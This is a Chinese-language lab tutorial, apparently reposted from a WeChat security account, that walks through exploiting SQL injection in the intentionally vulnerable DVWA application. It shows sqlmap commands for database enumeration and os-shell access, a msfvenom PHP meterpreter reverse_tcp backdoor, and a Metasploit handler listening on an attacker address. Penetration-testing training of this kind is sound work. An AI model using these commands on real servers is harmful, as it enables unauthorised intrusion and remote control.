DVWA 实验室设置
- 要求:
- Xampp/Wamp 服务器
- DVWA Web 易受攻击的应用程序
- Kali Linux:Burp套件、sqlmap工具
首先,你需要在 XAMPP 或 WAMP 服务器中安装 DVWA 实验室
导航至易受 SQL 注入攻击的页面
现在让我们通过 Web 浏览器导航到 DVWA 并使用以下凭据登录:
用户名 – admin
密码 – 密码
单击 DVWA Security并将网站安全级别 设置 为低
从漏洞列表中选择 SQL 注入作为攻击。在文本框中输入 用户 ID:1 。在未设置 Web 浏览器代理的情况下,请勿单击提交按钮。设置浏览器代理以使 burp suite 正常工作。
拦截浏览器请求
现在让我们按照以下步骤拦截浏览器请求:
Intercept 按钮用于显示浏览器和 Web 服务器之间传递的 HTTP 和 Web Sockets 消息。Burp suit 将在获取的数据下提供“cookie”和“referrer”,可直接在 sqlmap 命令中使用。
提取数据库名称
现在使用sqlmap进行SQL注入并运行以下命令来枚举数据库名称。
sqlmap -r file --dbs--batch
生成 os-shell
现在输入以下命令来运行 sqlmap 来访问 web 服务器 (dvwa) 的 os-shell
sqlmap -r file -D dvwa --os-shell
输入 4 进行暴力搜索,将其用作可写目录来上传。
它试图使用 SQL 注入技术将文件上传到“/xampp/htdocs/”。一旦文件上传,它将发送信息“文件暂存器已成功上传到 /xampp/htdocs/ ”,您将获得受害者电脑的 os-shell。除此之外,它还显示了文件暂存器的路径,您可以在其中手动上传后门,请查看上面突出显示的 URL:
http://192.168.1.105:80/tmpurufu.php
在浏览器中探索文件暂存器
在浏览器中浏览 URL :http://192.168.1.105/tmpurufu.php 。从下面的屏幕截图中,您可以看到网页的标题“ sqlmap file uploader ”,它可以让您在 Web 服务器 (dvwa) 上浏览您的后门,稍后我们可以将该后门上传到 Web 服务器的 /xampp/htdocs/ 目录中。
生成PHP后门
让我们用 msfvenom 准备可以上传的恶意 php 文件:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.109 lport=4444 -f raw
上传并执行 Msfvenom PHP 后门
单击 浏览选项卡以选择您的后门文件(shell.php) 文件,然后单击 上传。
msf> use multi/handler
msf exploit(handler) > set lport 4444
msf exploit(handler) > set lhost 192.168.1.109
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > exploit
原文始发于微信公众号(三沐数安):使用 Sqlmap 在 Web 服务器中上传 Shell
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论